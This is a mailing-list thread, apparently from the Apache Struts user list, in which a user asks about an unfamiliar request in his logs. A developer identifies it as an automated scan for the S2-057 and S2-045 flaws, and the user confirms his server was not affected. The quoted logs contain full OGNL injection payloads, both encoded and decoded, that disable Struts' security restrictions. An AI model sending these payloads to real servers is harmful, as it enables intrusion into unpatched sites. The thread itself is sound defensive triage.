Not seen this attempt before?

classic Classic list List threaded Threaded
7 messages Options
Reply | Threaded
Open this post in threaded view
|

Not seen this attempt before?

Greg Huber
Any ideas?

14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST
/%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action
HTTP/1.1" 500 1497 "-" "Auto Spider 1.0"
14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST /index.action HTTP/1.1"
200 2023 "-" "Auto Spider 1.0"

Cheers Greg
Reply | Threaded
Open this post in threaded view
|

Re: Not seen this attempt before?

info@flyingfischer.ch
Possibly in this section?:
https://github.com/rapid7/metasploit-framework/issues/8064

Am 20.01.19 um 13:02 schrieb Greg Huber:

> Any ideas?
>
> 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST
> /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action
> HTTP/1.1" 500 1497 "-" "Auto Spider 1.0"
> 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST /index.action HTTP/1.1"
> 200 2023 "-" "Auto Spider 1.0"
>
> Cheers Greg
>


---------------------------------------------------------------------
To unsubscribe, e-mail: [hidden email]
For additional commands, e-mail: [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: Not seen this attempt before?

Lukasz Lenart
In reply to this post by Greg Huber
niedz., 20 sty 2019 o 13:02 Greg Huber <[hidden email]> napisał(a):
>
> Any ideas?
>
> 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST
> /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action
> HTTP/1.1" 500 1497 "-" "Auto Spider 1.0"
> 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST /index.action HTTP/1.1"
> 200 2023 "-" "Auto Spider 1.0"

I would say a robot is scanning Internet to find vulnerable sites and
looks like it addresses the latest vulnerability with namespace
evaluation
https://cwiki.apache.org/confluence/display/WW/S2-057


Regards
--
Łukasz
+ 48 606 323 122 http://www.lenart.org.pl/

---------------------------------------------------------------------
To unsubscribe, e-mail: [hidden email]
For additional commands, e-mail: [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: Not seen this attempt before?

Greg Huber
OK, thanks, good work!  Did return 500 so looks damage was done.

from the logs
2019-01-18 18:13:33,218 WARN
org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest
JakartaMultiPartRequest:parse - Unable to parse request
org.apache.commons.fileupload.InvalidFileNameException: Invalid file name:
%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS
).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class
)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest
()).(#res=@org.apache.struts2.ServletActionContext@getResponse
()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('struts2_security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}\0b
    at
org.apache.commons.fileupload.util.Streams.checkFileName(Streams.java:187)
~[commons-fileupload-1.4.jar:1.4]
    at
org.apache.commons.fileupload.disk.DiskFileItem.getName(DiskFileItem.java:253)
~[commons-fileupload-1.4.jar:1.4]
....
....
2019-01-18 18:13:35,032 WARN
org.apache.struts2.dispatcher.mapper.DefaultActionMapper
DefaultActionMapper:cleanupMethodName -
#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS
,#req=@org.apache.struts2.ServletActionContext@getRequest
(),#res=@org.apache.struts2.ServletActionContext@getResponse(),#res.setCharacterEncoding(#parameters.encoding[0]),#w=#res.getWriter(),#w.print(#parameters.web[0]),#w.print(#parameters.path[0]),#w.close(),1?#xx:#request.toString
did not match allowed method names [a-zA-Z_]*[0-9]* - default method
execute will be used!

Cheers Greg

On Sun, 20 Jan 2019 at 14:33, Lukasz Lenart <[hidden email]> wrote:

> niedz., 20 sty 2019 o 13:02 Greg Huber <[hidden email]> napisał(a):
> >
> > Any ideas?
> >
> > 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST
> >
> /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action
> > HTTP/1.1" 500 1497 "-" "Auto Spider 1.0"
> > 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST /index.action
> HTTP/1.1"
> > 200 2023 "-" "Auto Spider 1.0"
>
> I would say a robot is scanning Internet to find vulnerable sites and
> looks like it addresses the latest vulnerability with namespace
> evaluation
> https://cwiki.apache.org/confluence/display/WW/S2-057
>
>
> Regards
> --
> Łukasz
> + 48 606 323 122 http://www.lenart.org.pl/
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: [hidden email]
> For additional commands, e-mail: [hidden email]
>
>
Reply | Threaded
Open this post in threaded view
|

Re: Not seen this attempt before?

Lukasz Lenart
This looks like https://cwiki.apache.org/confluence/display/WW/S2-045
What version of Struts do you run?

Cheers
Lukasz

niedz., 20 sty 2019 o 19:11 Greg Huber <[hidden email]> napisał(a):

>
> OK, thanks, good work!  Did return 500 so looks damage was done.
>
> from the logs
> 2019-01-18 18:13:33,218 WARN
> org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest
> JakartaMultiPartRequest:parse - Unable to parse request
> org.apache.commons.fileupload.InvalidFileNameException: Invalid file name:
> %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS
> ).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class
> )).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest
> ()).(#res=@org.apache.struts2.ServletActionContext@getResponse
> ()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('struts2_security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}\0b
>     at
> org.apache.commons.fileupload.util.Streams.checkFileName(Streams.java:187)
> ~[commons-fileupload-1.4.jar:1.4]
>     at
> org.apache.commons.fileupload.disk.DiskFileItem.getName(DiskFileItem.java:253)
> ~[commons-fileupload-1.4.jar:1.4]
> ....
> ....
> 2019-01-18 18:13:35,032 WARN
> org.apache.struts2.dispatcher.mapper.DefaultActionMapper
> DefaultActionMapper:cleanupMethodName -
> #_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS
> ,#req=@org.apache.struts2.ServletActionContext@getRequest
> (),#res=@org.apache.struts2.ServletActionContext@getResponse(),#res.setCharacterEncoding(#parameters.encoding[0]),#w=#res.getWriter(),#w.print(#parameters.web[0]),#w.print(#parameters.path[0]),#w.close(),1?#xx:#request.toString
> did not match allowed method names [a-zA-Z_]*[0-9]* - default method
> execute will be used!
>
> Cheers Greg
>
> On Sun, 20 Jan 2019 at 14:33, Lukasz Lenart <[hidden email]> wrote:
>
> > niedz., 20 sty 2019 o 13:02 Greg Huber <[hidden email]> napisał(a):
> > >
> > > Any ideas?
> > >
> > > 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST
> > >
> > /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action
> > > HTTP/1.1" 500 1497 "-" "Auto Spider 1.0"
> > > 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST /index.action
> > HTTP/1.1"
> > > 200 2023 "-" "Auto Spider 1.0"
> >
> > I would say a robot is scanning Internet to find vulnerable sites and
> > looks like it addresses the latest vulnerability with namespace
> > evaluation
> > https://cwiki.apache.org/confluence/display/WW/S2-057
> >
> >
> > Regards
> > --
> > Łukasz
> > + 48 606 323 122 http://www.lenart.org.pl/
> >
> > ---------------------------------------------------------------------
> > To unsubscribe, e-mail: [hidden email]
> > For additional commands, e-mail: [hidden email]
> >
> >

---------------------------------------------------------------------
To unsubscribe, e-mail: [hidden email]
For additional commands, e-mail: [hidden email]

Reply | Threaded
Open this post in threaded view
|

Re: Not seen this attempt before?

Greg Huber
 Always on the latest.  There was a typo in my reply, sorry :-)

....OK, thanks, good work!  Did return 500 so looks LIKE NO damage was done.

On Tue, 22 Jan 2019 at 08:34, Lukasz Lenart <[hidden email]> wrote:

> This looks like https://cwiki.apache.org/confluence/display/WW/S2-045
> What version of Struts do you run?
>
> Cheers
> Lukasz
>
> niedz., 20 sty 2019 o 19:11 Greg Huber <[hidden email]> napisał(a):
> >
> > OK, thanks, good work!  Did return 500 so looks damage was done.
> >
> > from the logs
> > 2019-01-18 18:13:33,218 WARN
> > org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest
> > JakartaMultiPartRequest:parse - Unable to parse request
> > org.apache.commons.fileupload.InvalidFileNameException: Invalid file
> name:
> >
> %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS
> >
> ).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class
> >
> )).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest
> > ()).(#res=@org.apache.struts2.ServletActionContext@getResponse
> >
> ()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('struts2_security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}\0b
> >     at
> >
> org.apache.commons.fileupload.util.Streams.checkFileName(Streams.java:187)
> > ~[commons-fileupload-1.4.jar:1.4]
> >     at
> >
> org.apache.commons.fileupload.disk.DiskFileItem.getName(DiskFileItem.java:253)
> > ~[commons-fileupload-1.4.jar:1.4]
> > ....
> > ....
> > 2019-01-18 18:13:35,032 WARN
> > org.apache.struts2.dispatcher.mapper.DefaultActionMapper
> > DefaultActionMapper:cleanupMethodName -
> > #_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS
> > ,#req=@org.apache.struts2.ServletActionContext@getRequest
> > (),#res=@org.apache.struts2.ServletActionContext@getResponse
> (),#res.setCharacterEncoding(#parameters.encoding[0]),#w=#res.getWriter(),#w.print(#parameters.web[0]),#w.print(#parameters.path[0]),#w.close(),1?#xx:#request.toString
> > did not match allowed method names [a-zA-Z_]*[0-9]* - default method
> > execute will be used!
> >
> > Cheers Greg
> >
> > On Sun, 20 Jan 2019 at 14:33, Lukasz Lenart <[hidden email]>
> wrote:
> >
> > > niedz., 20 sty 2019 o 13:02 Greg Huber <[hidden email]>
> napisał(a):
> > > >
> > > > Any ideas?
> > > >
> > > > 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST
> > > >
> > >
> /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action
> > > > HTTP/1.1" 500 1497 "-" "Auto Spider 1.0"
> > > > 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST /index.action
> > > HTTP/1.1"
> > > > 200 2023 "-" "Auto Spider 1.0"
> > >
> > > I would say a robot is scanning Internet to find vulnerable sites and
> > > looks like it addresses the latest vulnerability with namespace
> > > evaluation
> > > https://cwiki.apache.org/confluence/display/WW/S2-057
> > >
> > >
> > > Regards
> > > --
> > > Łukasz
> > > + 48 606 323 122 http://www.lenart.org.pl/
> > >
> > > ---------------------------------------------------------------------
> > > To unsubscribe, e-mail: [hidden email]
> > > For additional commands, e-mail: [hidden email]
> > >
> > >
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: [hidden email]
> For additional commands, e-mail: [hidden email]
>
>
Reply | Threaded
Open this post in threaded view
|

Re: Not seen this attempt before?

Lukasz Lenart
Yes, that's ok.

wt., 22 sty 2019 o 09:58 Greg Huber <[hidden email]> napisał(a):

>
>  Always on the latest.  There was a typo in my reply, sorry :-)
>
> ....OK, thanks, good work!  Did return 500 so looks LIKE NO damage was done.
>
> On Tue, 22 Jan 2019 at 08:34, Lukasz Lenart <[hidden email]> wrote:
>
> > This looks like https://cwiki.apache.org/confluence/display/WW/S2-045
> > What version of Struts do you run?
> >
> > Cheers
> > Lukasz
> >
> > niedz., 20 sty 2019 o 19:11 Greg Huber <[hidden email]> napisał(a):
> > >
> > > OK, thanks, good work!  Did return 500 so looks damage was done.
> > >
> > > from the logs
> > > 2019-01-18 18:13:33,218 WARN
> > > org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest
> > > JakartaMultiPartRequest:parse - Unable to parse request
> > > org.apache.commons.fileupload.InvalidFileNameException: Invalid file
> > name:
> > >
> > %{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS
> > >
> > ).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class
> > >
> > )).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest
> > > ()).(#res=@org.apache.struts2.ServletActionContext@getResponse
> > >
> > ()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('struts2_security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}\0b
> > >     at
> > >
> > org.apache.commons.fileupload.util.Streams.checkFileName(Streams.java:187)
> > > ~[commons-fileupload-1.4.jar:1.4]
> > >     at
> > >
> > org.apache.commons.fileupload.disk.DiskFileItem.getName(DiskFileItem.java:253)
> > > ~[commons-fileupload-1.4.jar:1.4]
> > > ....
> > > ....
> > > 2019-01-18 18:13:35,032 WARN
> > > org.apache.struts2.dispatcher.mapper.DefaultActionMapper
> > > DefaultActionMapper:cleanupMethodName -
> > > #_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS
> > > ,#req=@org.apache.struts2.ServletActionContext@getRequest
> > > (),#res=@org.apache.struts2.ServletActionContext@getResponse
> > (),#res.setCharacterEncoding(#parameters.encoding[0]),#w=#res.getWriter(),#w.print(#parameters.web[0]),#w.print(#parameters.path[0]),#w.close(),1?#xx:#request.toString
> > > did not match allowed method names [a-zA-Z_]*[0-9]* - default method
> > > execute will be used!
> > >
> > > Cheers Greg
> > >
> > > On Sun, 20 Jan 2019 at 14:33, Lukasz Lenart <[hidden email]>
> > wrote:
> > >
> > > > niedz., 20 sty 2019 o 13:02 Greg Huber <[hidden email]>
> > napisał(a):
> > > > >
> > > > > Any ideas?
> > > > >
> > > > > 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST
> > > > >
> > > >
> > /%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27eresult%27%2c%27struts2_security_check%27))%7d/index.action
> > > > > HTTP/1.1" 500 1497 "-" "Auto Spider 1.0"
> > > > > 14.98.162.41 - - [18/Jan/2019:18:13:32 +0000] "POST /index.action
> > > > HTTP/1.1"
> > > > > 200 2023 "-" "Auto Spider 1.0"
> > > >
> > > > I would say a robot is scanning Internet to find vulnerable sites and
> > > > looks like it addresses the latest vulnerability with namespace
> > > > evaluation
> > > > https://cwiki.apache.org/confluence/display/WW/S2-057
> > > >
> > > >
> > > > Regards
> > > > --
> > > > Łukasz
> > > > + 48 606 323 122 http://www.lenart.org.pl/
> > > >
> > > > ---------------------------------------------------------------------
> > > > To unsubscribe, e-mail: [hidden email]
> > > > For additional commands, e-mail: [hidden email]
> > > >
> > > >
> >
> > ---------------------------------------------------------------------
> > To unsubscribe, e-mail: [hidden email]
> > For additional commands, e-mail: [hidden email]
> >
> >

---------------------------------------------------------------------
To unsubscribe, e-mail: [hidden email]
For additional commands, e-mail: [hidden email]